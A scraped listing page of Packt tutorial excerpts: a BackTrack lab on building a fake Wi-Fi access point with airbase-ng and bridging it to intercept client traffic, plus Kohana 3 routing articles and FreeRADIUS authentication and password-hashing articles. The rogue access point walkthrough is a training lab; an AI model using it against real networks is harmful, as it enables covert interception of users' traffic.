  (For more resources on BackTrack, see here.) Man-in-the-Middle attack MITM attacks are probably one of most potent attacks on a WLAN system. There are different configurations that can be used to conduct the attack. We will use the most common one—the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidently get connected to this fake access point and may continue to believe that he is connected to the legitimate access point. The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces. In the following lab exercise, we will simulate this attack. Time for action – Man-in-the-Middle attack Follow these instructions to get started: To create the Man-in-the-Middle attack setup, we will first c create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm –c 11 mon0: It is important to note that airbase-ng when run, creates an interface at0 (tap interface). Think of this as the wired-side interface of our software-based access point mitm. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless interface (at0). The succession of commands used for this are—brctl addbr mitm-bridge, brctl addif mitm-bridge eth0, brctl addif mitmbridge at0, ifconfig eth0 0.0.0.0 up, ifconfig at0 0.0.0.0 up: We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we could do the same using DHCP as well. We can assign an IP address to the bridge interface with the command—ifconfig mitm-bridge 192.168.0.199 up. We can then try pinging the gateway 192.168.0.1 to ensure we are connected to the rest of the network: Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding can happen correctly using echo > 1 /proc/sys/net/ipv4/ip_forward: Now let us connect a wireless client to our access point mitm. It would automatically get an IP address over DHCP (server running on the wired-side gateway). The client machine in this case receives the IP address 192.168.0.197. We can ping the wired side gateway 192.168.0.1 to verify connectivity: We see that the host responds to the ping requests as seen: We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine: It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired-side, we have full control over the traffic. We can verify this by starting Wireshark and start sniffing on the at0 interface: (Move the mouse over the image to enlarge it.) Let us now ping the gateway 192.168.0.1 from the client machine. We can now see the packets in Wireshark (apply a display filter for ICMP), even though the packets are not destined for us. This is the power of Man-in-the-Middle attacks! (Move the mouse over the image to enlarge it.) What just happened? We have successfully created the setup for a wireless Man-In-The-Middle attack. We did this by creating a fake access point and bridging it with our Ethernet interface. This ensured that any wireless client connecting to the fake access point would "perceive" that it is connected to the Internet via the wired LAN. Have a go hero – Man-in-the-Middle over pure wireless In the previous exercise, we bridged the wireless interface with a wired one. As we noted earlier, this is one of the possible connection architectures for an MITM. There are other combinations possible as well. An interesting one would be to have two wireless interfaces, one creates the fake access point and the other interface is connected to the authorized access point. Both these interfaces are bridged. So, when a wireless client connects to our fake access point, it gets connected to the authorized access point through the attacker machine. Please note that this configuration would require the use of two wireless cards on the attacker laptop. Check if you can conduct this attack using the in-built card on your laptop along with the external one. This should be a good challenge!
Read more
  • 0
  • 0
  • 3667

article-image-routing-kohana-3
Packt
12 Sep 2011
8 min read
Save for later

Routing in Kohana 3

Packt
12 Sep 2011
8 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Request Flow in Kohana 3. Routing in Kohana If you remember, the bootstrap file comes preconfigured with a default route that follows a very simple structure: Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); This tells Kohana that when it parses the URL for any request, it first finds the base_url, and then the next segment will contain the controller, then the action, then an ID. These are all optional setgments, with the default controller and action being set in the array. We have taken advantage of this route with other controllers like our Profile and Message controller. When we visit http://localhost/egotist/profile, the route sets the controller to profile, and since no action or ID is explicitly defined in the URL, the default action of ‘index’ is used. When we requested http://localhost/egotist/messages/get_messages from within our Profile Controller, we also followed this route; however, neither defaults were needed, and the route asked for the Messages Controller and its get_messages action. In our Profile controller, we are only using one array of example messages to test functionality and the expected behavior of our application. When we implement a data store and have multiple users with profiles in our application, we will need a way to decipher which profile a user wants to see. Because the default route already has an available parameter for ID, we can use that to pass an ID to our Profile Controller’s index action, and have the messages controller then find the proper messages for that user.   Time for action – Making profiles dynamic using ID Once a database is tied to our application, and more than one user has a profile, we will need some way of knowing which profile to display. A simple and effective way to do this is to pass a user ID in the route, and have our controller use that ID to find the right messages for the right user. Let’s add some more test data to our messages system, and use an ID to display the right messages. Open the Profile Controller in our application/classes/controller/ directory named profile.php. Since the action_index() method is the controller action that is called when a profile is viewed, we will need to edit it to look for the ID parameter in the URI like this: public function action_index(){ $content = View::factory(<profile/public>) ->set(<username>, <Test User>) ->bind(<messages>, $messages); $id = (int) $this->request->param(‘id’); $messages_uri = "messages/get_messages/$id"; $messages = Request::factory($messages_uri)->execute()->response; $this->template->content = $content;} Now, we are retrieving the ID from the route and passing it along in our request to the Messages Controller. This means that class must also be updated. Open the messages.php file located in application/classes/controllers/ and modify its action_get_messages() method as follows: public function action_get_messages(){ $id = (int) $this->request->param(‘id’); $messages = array( 1 => array( ‘This is test message one for user 1’, ‘This is test message two for user 1’, ‘This is test message three for user 1’ ), 2 => array( ‘This is test message one for user 2’, ‘This is test message two for user 2’, ‘This is test message three for user 2’ ) ); $messages = array_key_exists($id, $messages) ? $messages[$id] :NULL; $this->request->response = View::factory(‘profile/messages’) ->set(‘messages’, $messages);} Open the page http://localhost/egotist/profile/index/2/. It should look like this: Browsing to http://localhost/egotist/profile/index/1/ will show the messages for user 1, i.e., the test messages placed in the message array under key 1. What just happened? At the very beginning of our index action in our Profile Controller, we set our $id variable by getting the ID parameter from the route. Since Kohana has parsed our route for us, we can now access these parameters via the request object’s param() method. Once we got the ID variable, we then created and executed the request for the message controller’s get_messages action, and passed the ID to that method for it to use. In the Message Controller, we used the same method to extract the ID from the request, and then used that ID to determine which messages from the messages array to display. Although this works fine for illustrating routing for these two users, the code is far from ready, even without a data store or real user data, but it does show how the parameters can be read and used. Because most of the functionality in the controller will be replaced with our database and more precise data being passed around, we can overlook the incompleteness of the current controller actions, and begin looking at creating a URL that is better looking than http://localhost/egotist/profile/index/2/ for finding a user profile by ID. Creating friendly URLs using custom routes Consider how nice it would be if our users could browse to a profile without putting ‘index’ in the action portion of the URI, like this: http://localhost/egotist/profile/2. This looks much more pleasing, and is more in line with what we would like our URLs to look like in web apps. It is in fact very easy to have Kohana use a route to remove the index action from the URI. Routes not only make our URLs more pleasing and descriptive, but they make our application easier to maintain in the long run. We have more control over where our users are being directed from how the URL is constructed, without having to create controller actions designed to handle routing.   Time for action – Creating a Custom Route So far, we have been using the default route that is in our application bootstrap. As our application grows, so will the number of available ‘starting points’ for our user’s requests. Not every controller, action, or parameter has to comply with the default route, and this gives us a lot of flexibility and freedom. We can add a custom route to handle user’s profiles by adding it to our bootstrap.php file. Open the bootstrap.php file located in application/directory and modify the routes block so it looks like this: /** * Set the routes.Each route must have a minimum of a name,a URI * and a set of defaults for the URI. */Route::set(‘profile’, ‘profile/<id>’) ->defaults(array( ‘controller’ => ‘profile’, ‘action’ => ‘index’, ));Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); Now, we can view the profile pages without having to pass the index action in the URL. Open http://localhost/egotist/profile/2 in a browser; it should look like this: Browsing to profiles with a more friendly URL is made possible through Kohana’s routes. What just happened? By setting routes using the Route::set static method, we are essentially creating filters that will be used to match requests with routes. We can name these routes; in this case we have one named default, and one named profile. Kohana uses the second parameter in the set() method to compare against the requested URI, and will call the first route that matches the request. Because it uses the first route that matches the request, it is very important when ordering route definitions. If we put the default route before the profile route, the profile route will never be used, as the default route would always match first. Because it looks for a match, it does not use discretion when determining the right route for a request. So if we browse to http://localhost/egotist/profile/index/2, we will be directed to the default route, and get the same result. The default route may not be available for all the routes we create in the future, so create routes that are as explicit as we can for our needs. Right now, our application assumes any data that is passed after a controller segment named ‘profile’ must be the ID for which we are looking. In our current application setup, we only need digits. If a user passes data into the URL that is not numeric for the ID parameter, we do not want it to go to that route. This can be accomplished easily inside the Route::set() method.  
Read more
  • 0
  • 0
  • 2730

article-image-request-flow-kohana-3
Packt
12 Sep 2011
12 min read
Save for later

Request Flow in Kohana 3

Packt
12 Sep 2011
12 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Routing in Kohana 3.   Hierarchy is King in Kohana Kohana is layered in more ways than one. First, it has a cascading files system. This means the framework loads files for each of it’s core parts in a hierarchical order, which is explained in more detail in just a bit. Next, Kohana allows for controllers to initiate requests, making the application workflow follow a hierarchical design pattern. These features are the foundation of HMVC, which essentially is a cascading filesystem, flexible routing and request handling, the ability to execute sub-requests combined with a standard MVC pattern. The framework manages locating and loading the right file by using a core method named Kohana::find_file(). This method searches the filesystem in a predetermined order to load the proper class first. The order the method searches in is (with default paths): Application path (/application) Modules (/modules) as ordered in bootstrap.php System path (/system) Cascading filesystem As the framework loads, it creates a merged filesystem based on the order of loading described above. One of the benefits of loading files this way is the ease to overload classes that would be loaded later in the flow. We never have to, nor should we, alter a file in the system directory. We can override the default behavior of any method by overloading it in the application directory. Another great advantage is the consistency this mechanism offers. We know the exact load order for every class in any application, making it much easier to create custom code and know exactly where it needs to live. This image shows an example application being merged into the final file structure that will be used when completing a request. We can see how some classes in the application layer are overriding files in the modules. This makes it easier to visualize how modules extend and enhance the framework by building on the system core. Our application then sits on top of the system and module files, and then can build and extend the functionality of the module and system layers. Kohana also makes it easy to load third-party libraries, referred to as vendor libraries, into the filesystem. Each of the three layers has five basic folders into which Kohana looks: Classes (/classes) contain all autoloaded class files. This directory includes our Controller, Models, and their supporting classes. Autoloading allows us to use classes without having to include them manually. Any classes inside this directory will automatically be searched and loaded when they are used. Config files (/config) are files containing arrays that can be parsed and loaded using the core method Kohana::config(). Some config files are required to configure and properly load modules, while others may be created by us to make our application easier to maintain, or to keep vendor libraries tidy by moving config data to the framework. Config files are the only files in the cascading filesystem that are not overloaded; all config files are merged with their parent files. Internationalization files (/i18n) make it much easier to create language files that work with our applications to deliver the proper content that best suits the language of our users. Messages (/messages) are much like configuration files, in that they are arrays that are loaded by a core Kohana method. Kohana:: message() parses and returns the messages for a specific array. This functionality is very useful when creating forms and actions for our applications. View files (/views) are the presentation layer of our applications, where view files and template files live.   Request flow in Kohana Now that we have seen how the framework merges files to create a set of files to load on request, it is a good place to see the flow of the files in Kohana. Remember that controllers can invoke requests, making a bit of a loop between controllers, models, and views, but the frameworks always runs in the same order, beginning with the index.php file. The index.php file sets the path to the application, modules, and system directories and saves them to as constants that are then defined for global use. These constants are APPPATH, MODPATH, and SYSPATH, and they hold the paths for the application, modules, and system paths respectively. After the error-reporting levels are set, Kohana looks to see if the install.php file exists. If the install file is not found, Kohana takes the next step in loading the framework by loading the core Kohana class. Next, the index file looks for the application’s Kohana class, first in the application directory, then in the system path. This is the first example of Kohana looking for our files before it looks for its own. The last thing the index file does is bootstrap our application, by requiring the bootstrap.php file and loading it. You probably remember having to configure the bootstrap file when we installed Kohana. This is the file in which we set our base URL and modules; however, it is a bit more important than just basic installation and configuration. The boostrap begins by setting a some basic environment settings, like the default timezone and locale. Next, it enables the autoloader, and defines the application environment. This tells the framework whether our application is in a production or development environment, allowing it to make decisions based on its environment-specific settings. Next, the default options are set and Kohana is initialized, with the Kohana::init() method being called. After Kohana’s initialization, it sets up logging, configuration reading, and then modules. Modules are loaded defined using an array, with the module name as the key, and the path to the module as the value. The modules load order is listed in this array, and are all subject to the same rules and conventions as core and application code. Each module is added to the cascading file system as described above, allowing files to override any that may be added later when the system files are merged. Modules can contain their own init files, named init.php, that act similar to the application bootstrap, adding routes specific to the modules for our application to use. The last thing the bootstrap does in a normal request flow is to set the routes for the application. Kohana ships with a default route that loads the index action in the welcome controller. The Route object’s set method accepts an array that defines the name, URI, and defaults for the parameters set for the URI. By setting default controllers, actions, and params, we can have dynamic URLs that have default values if none are passed. If no controller or action is passed in the URI on a vanilla Kohana install, the welcome controller will be loaded, and the index action invoked as outlined in the array passed to the Route::set() method in the boostrap. Once all the application routes are set via the Route::set() method and init.php files residing in modules, Request::instance() is invoked, setting the request loop into action. As the Request object processes the request, it looks through routes until it finds the right controller to load. The request object then instantiates the controller, passing the request to the controller for it to use. The Controller::before() method is then called, which acts much like a constructor. By being called first, the before() method allows any logic that need to be performed before a controller action is run to execute. Once the before method is complete, the object continues to load the requested functions, just like when a constructor is complete. The controller action, a method in the controller class, is then called, and once complete, it returns the request response. The action method is where the business logic for the request will reside. Once the action is complete, the Controller::after() method is called, much like the destructor of a standard PHP class. Because of the hierarchical structure of Kohana, any controller can initiate a new request, making it possible for other controllers to be loaded, invoking more controller actions, which generate request responses. Once all the requests have been fulfilled, Kohana renders the final request response. The Kohana request flow can seem like it is long and complex, but it can also be looked at as very clean and organized. By using a front controller design pattern, all requests are handled by just one file: index.php. Each and every request that is handled by our applications will begin with this one file. From there the application is bootstrapped, and then the controller designed to handle the specific request is found, executed, and displayed. Although, as we have seen, there is more that is happening, for most of our applications, this simple way of looking at the request flow will make it easy to create powerful web applications using Kohana.   Using the Request object The request flow in Kohana is interesting, and it is easy to see how it can be powerful on a high level, but the best way to understand HMVC and routing in Kohana is to look at some actual code, and see what the resulting outcome is for real world scenarios. Kohana’s Request object determines the proper controller to invoke, and acts as a wrapper for the response. If we look at the Template Controller that we are extending in our Application Controller for the case study site, we can follow the inheritance path back to Kohana’s template controller, and see the request response. One of the best ways to understand what is happening inside the framework is to drill down through the filesystem and look at the actual code. One of the great advantages of open sources frameworks is the ability to read the code that makes the library run. Opening the welcome controller located at application/classes/controller/welcome.php, we see the following class declaration: class Controller_Welcome extends Controller_Application The first thing we see in the base controller class is that it extends another Controller, and then we see the declaration of an object property named $request. This variable holds the Kohana_Request object, the class that created the original controller call. In the constructor, we can see that the Kohana_Request object is being type-hinted for the argument, and it is setting the $request object property on instantiation. All that is left in the base Controller class is the before() and after() methods with no functionality. We can then open our Application Controller, located at application/classes/controller/application.php. The class declaration in this controller looks like this: abstract class Controller_Application extends Controller_Template In this file, we can see the before() method loading the template view into the template variable, and in the after() method, we see the Request obeject ($this->request) having the response body set, ready to be rendered. This class, in turn, extends the Template Controller. The Template Controller is part of the Kohana system. Since we have not created any controllers in our application or modules the original template controller that ships with Kohana is being loaded. It is located at system/classes/controller/template.php. The class declaration in this controller looks like: abstract class Controller_Template extends Kohana_Controller_Template Here things take a twist, and for the first time, we are going to have to leave the /classes/controller/ structure to find an inherited class. The Kohana_Controller_Template class lives in system/classes/kohana/controller/template.php. The class is fairly short and simple, and it has this class declaration: abstract class Kohana_Controller_Template extends Controller This controller (system/classes/controller.php) is the base controller that all requested controller classes must extend. Examining this class will let us see the Request class enter the Controller loop and the template view get sent to the Request object as the response. Walking through the Welcome Controller’s heritage is a great way of seeing how the Request object loads a controller, and how the parent classes all contribute to the request flow in Kohana. It may seem like pointless complexity at first, however, the benefits of transparent extension are very powerful, and Kohana makes the mechanisms work all behind the scenes. But one question still remains: How is the request object aware of the controllers and routes? Athough dissecting Kohana’s Request Class could be a article unto itself, a lot can be answered by looking at the contstructor in the system/classes/kohana/request.php file. The constructor is given the URI, and then stores object properties that the object will later use to execute the request. The Request class does have a couple of key methods that can be very helpful. The first is Request::controller(), which returns the name of the controller for the request, and the other is Request::action(), which similarly returns the name of the action for the request. After loading the routes, the method then iterates through the routes, determines any matches for the URI, and begins setting the controller, action, and parameters for the route. If there are not matches for optional segments of the route, the defaults are stored in the object properties. When the Request object’s execute() method is called, the request is processed, and the response is returned. This happens by first processing the before() method, then the controller action being requested, then the after() method for the class, followed by any other requests until all have completed. The topic of initiating a request from within a controller has arisen a few times, and is the best way to illustrate the Hierarchical aspect of HMVC. Let’s take a look at this process by creating a controller method that initiates a new request, and see how it completes.  
Read more
  • 0
  • 0
  • 2532
article-image-freeradius-working-authentication-methods
Packt
08 Sep 2011
6 min read
Save for later

FreeRADIUS: Working with Authentication Methods

Packt
08 Sep 2011
6 min read
Authentication is a process where we establish if someone is who he or she claims to be. The most common way is by a unique username and password. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches authentication methods and how they work. Extensible Authentication Protocol (EAP) is covered later in a dedicated article. In this article we shall: Discuss PAP, CHAP, and MS-CHAP authentication protocols See when and how authentication is done in FreeRADIUS Explore ways to store passwords Look at other authentication methods (For more resources on this subject, see here.) Authentication protocols This section will give you background on three common authentication protocols. These protocols involve the supply of a username and password. The radtest program uses the Password Authentication Protocol (PAP) by default when testing authentication. PAP is not the only authentication protocol but probably the most generic and widely used. Authentication protocols you should know about are PAP, CHAP, and MS-CHAP. Each of these protocols involves a username and password. The next article on Extensible Authentication Protocol (EAP) protocol will introduce us to more authentication protocols. An authentication protocol is typically used on the data link layer that connects the client with the NAS. The network layer will only be established after the authentication is successful. The NAS acts as a broker to forward the requests from the user to the RADIUS server. The data link layer and network layer are layers inside the Open Systems Interconnect model (OSI model). The discussion of this model is almost guaranteed to be found in any book on networking:http://en.wikipedia.org/wiki/OSI_model PAP PAP was one of the first protocols used to facilitate the supply of a username and password when making point-to-point connections. With PAP the NAS takes the PAP ID and password and sends them in an Access-Request packet as the User-Name and User-Password. PAP is simpler compared to CHAP and MS-CHAP because the NAS simply hands the RADIUS server a username and password, which are then checked. This username and password come directly from the user through the NAS to the server in a single action. Although PAP transmits passwords in clear text, using it should not always be frowned upon. This password is only in clear text between the user and the NAS. The user's password will be encrypted when the NAS forwards the request to the RADIUS server. If PAP is used inside a secure tunnel it is as secure as the tunnel. This is similar to when your credit card details are tunnelled inside an HTTPS connection and delivered to a secure web server. HTTPS stands for Hypertext Transfer Protocol Secure and is a web standard that uses Secure Socket Layer/Transport Layer Security (SSL/TLS) to create a secure channel over an insecure network. Once this secure channel is established, we can transfer sensitive data, like credit card details, through it. HTTPS is used daily to secure many millions of transactions over the Internet. See the following schematic of a typical captive portal configuration. The following table shows the RADIUS AVPs involved in a PAP request: As you can see the value of User-Password is encrypted between the NAS and the RADIUS server. Transporting the user's password from the user to the NAS may be a security risk if it can be captured by a third party. CHAP CHAP stands for Challenge-Handshake Authentication Protocol and was designed as an improvement to PAP. It prevents you from transmitting a cleartext password. CHAP was created in the days when dial-up modems were popular and the concern about PAP's cleartext passwords was high. After a link is established to the NAS, the NAS generates a random challenge and sends it to the user. The user then responds to this challenge by returning a one-way hash calculated on an identifier (sent along with the challenge), the challenge, and the user's password. The user's response is then used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS will return CHAP Success or CHAP Failure to the user. The NAS can also request at random intervals that the authentication process be repeated by sending a new challenge to the user. This is another reason why it is considered more secure than PAP. One major drawback of CHAP is that although the password is transmitted encrypted, the password source has to be in clear text for FreeRADIUS to perform password verification. The FreeRADIUS FAQ discuss the dangers of transmitting a cleartext password compared to storing all the passwords in clear text on the server. The following table shows the RADIUS AVPs involved in a CHAP request: MS-CHAP MS-CHAP is a challenge-handshake authentication protocol created by Microsoft. There are two versions, MS-CHAP version 1 and MS-CHAP version 2. The challenge sent by the NAS is identical in format to the standard CHAP challenge packet. This includes an identifier and arbitrary challenge. The response from the user is also identical in format to the standard CHAP response packet. The only difference is the format of the Value field. The Value field is sub-formatted to contain MS-CHAP-specific fields. One of the fields (NT-Response) contains the username and password in a very specific encrypted format. The reply from the user will be used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS will return Success Packet or Failure Packet to the user. The RADIUS server is not involved with the sending out of the challenge. If you sniff the RADIUS traffic between an NAS and a RADIUS server you can confirm that there is only an Access-Request followed by an Access-Accept or Access-Reject. The sending out of a challenge to the user and receiving a response from her or him is between the NAS and the user. MS-CHAP also has some enhancements that are not part of CHAP, like the user's ability to change his or her password or inclusion of more descriptive error messages. The protocol is tightly integrated with the LAN Manager and NT Password hashes. FreeRADIUS will convert a user's cleartext password to an LM-Password and an NT-Password in order to determine if the password hash that came out of the MS-CHAP request is correct. Although there are known weaknesses with MS-CHAP, it remains widely used and very popular. Never say never. If your current requirement for the RADIUS deployment does not include the use of MS-CHAP, rather cater for the possibility that one day you may use it. The most popular EAP protocol makes use of MS-CHAP. EAP is crucial in Wi-Fi authentication. Because MS-CHAP is vendor specific, VSAs instead of AVPs are part of the Access-Request between the NAS and RADIUS server. This is used together with the User-Name AVP. Now that we know more about the authentication protocols, let's see how FreeRADIUS handles them.
Read more
  • 0
  • 0
  • 9947

article-image-storing-passwords-using-freeradius-authentication
Packt
08 Sep 2011
6 min read
Save for later

Storing Passwords Using FreeRADIUS Authentication

Packt
08 Sep 2011
6 min read
In the previous article we covered the Authentication Methods used while working with FreeRADIUS. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches methods for storing passwords and how they work. Passwords do not need to be stored in clear text and it is better to store them in a hashed format. There are, however, limitations to the kind of authentication protocols that can be used when the passwords are stored as a hash which we will explore in this article. (For more resources on this subject, see here.) Storing passwords Username and password combinations have to be stored somewhere. The following list mentions some of the popular places: Text files: You should be familiar with this method by now. SQL databases: FreeRADIUS includes modules to interact with SQL databases. MySQL is very popular and widely used with FreeRADIUS. Directories: Microsoft's Active Directory or Novell's e-Directory are typical enterprise-size directories. OpenLDAP is a popular open source alternative. The users file and the SQL database that can be used by FreeRADIUS store the username and password as AVPs. When the value of this AVP is in clear text, it can be dangerous if the wrong person gets hold of it. Let's see how this risk can be minimized. Hash formats To reduce this risk, we can store the passwords in a hashed format. A hashed format of a password is like a digital fingerprint of that password's text value. There are many different ways to calculate this hash, for example MD5 or SHA1. The end result of a hash should be a one-way fixed-length encrypted string that uniquely represents the password. It should be impossible to retrieve the original password out of the hash. To make the hash even more secure and more immune to dictionary attacks we can add a salt to the function that generates the hash. A salt is randomly generated bits to be used in combination with the password as input to the one way hash function. With FreeRADIUS we store the salt along with the hash. It is therefore essential to have a random salt with each hash to make a rainbow table attack difficult. The pap module, which is used for PAP authentication, can use passwords stored in the following hash formats to authenticate users: Both MD5 and SSH1 hash functions can be used with a salt to make it more secure. Time for action – hashing our password We will replace the Cleartext-Password AVP in the users file with a more secure hashed password AVP in this section. There seems to be a general confusion on how the hashed password should be created and presented. We will help you clarify this issue in order to produce working hashes for each format. A valuable URL to assist us with the hashes is the OpenLDAP FAQ: http://www.openldap.org/faq/data/cache/419.html There are a few sections that show how to create different types of password hashes. We can adapt this for our own use in FreeRADIUS. Crypt-Password Crypt password hashes have their origins in Unix computing. Stronger hashing methods are preferred over crypt, although crypt is still widely used. The following Perl one-liner will produce a crypt password for passme with the salt value of 'salt': #> perl -e 'print(crypt("passme","salt")."n");' Use this output and change Alice's check entry in the users file from: "alice" Cleartext-Password := "passme" to: "alice" Crypt-Password := "sa85/iGj2UWlA" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the crypt password by looking for the following line in the FreeRADIUS debug feedback: [pap] Using CRYPT password "sa85/iGj2UWlA" MD5-Password The MD5 hash is often used to check the integrity of a file. When downloading a Linux ISO image you are also typically supplied with the MD5 sum of the file. You can then confirm the integrity of the file by using the md5sum command. We can also generate an MD5 hash from a password. We will use Perl to generate and encode the MD5 hash in the correct format that is required by the pap module. The creation of this password hash involves external Perl modules, which you may have to install first before the script can be used. The following steps will show you how: Create a Perl script with the following contents; we'll name it 4088_04_md5.pl: #! /usr/bin/perl -wuse strict;use Digest::MD5;use MIME::Base64;unless($ARGV[0]){ print "Please supply a password to create a MD5 hash from.n"; exit;}my $ctx = Digest::MD5->new;$ctx->add($ARGV[0]);print encode_base64($ctx->digest,'')."n"; Make the 4088_04_md5.pl file executable: chmod 755 4088_04_md5.pl Get the MD5 password for passme: ./4088_04_md5.pl passme Use this output and update Alice's entry in the user's file to: "alice" MD5-Password := "ugGBYPwm4MwukpuOBx8FLQ==" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the MD5 password by looking for the following line in the FreeRADIUS debug feedback: [pap] Using MD5 encryption. SMD5-Password This is an MD5 password with salt. The creation of this password hash involves external Perl modules, which you may have to install first before the script can be used. Create a Perl script with the following contents; we'll name it 4088_04_smd5.pl: #! /usr/bin/perl -wuse strict;use Digest::MD5;use MIME::Base64;unless(($ARGV[0])&&($ARGV[1])){ print "Please supply a password and salt to create a salted MD5 hash from.n"; exit;}my $ctx = Digest::MD5->new;$ctx->add($ARGV[0]);my $salt = $ARGV[1];$ctx->add($salt);print encode_base64($ctx->digest . $salt ,'')."n"; Make the 4088_04_smd5.pl file executable: chmod 755 4088_04_smd5.pl Get the SMD5 value for passme using a salt value of 'salt': ./4088_04_smd5.pl passme salt Remember that you should use a random value for the salt. We only used salt here for the demonstration. Use this output and update Alice's entry in the user's file to: "alice" SMD5-Password := "Vr6uPTrGykq4yKig67v5kHNhbHQ=" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the SMD5 password by looking for the following line in the FreeRADIUS debug feedback. [pap] Using SMD5 encryption.
Read more
  • 0
  • 0
  • 22373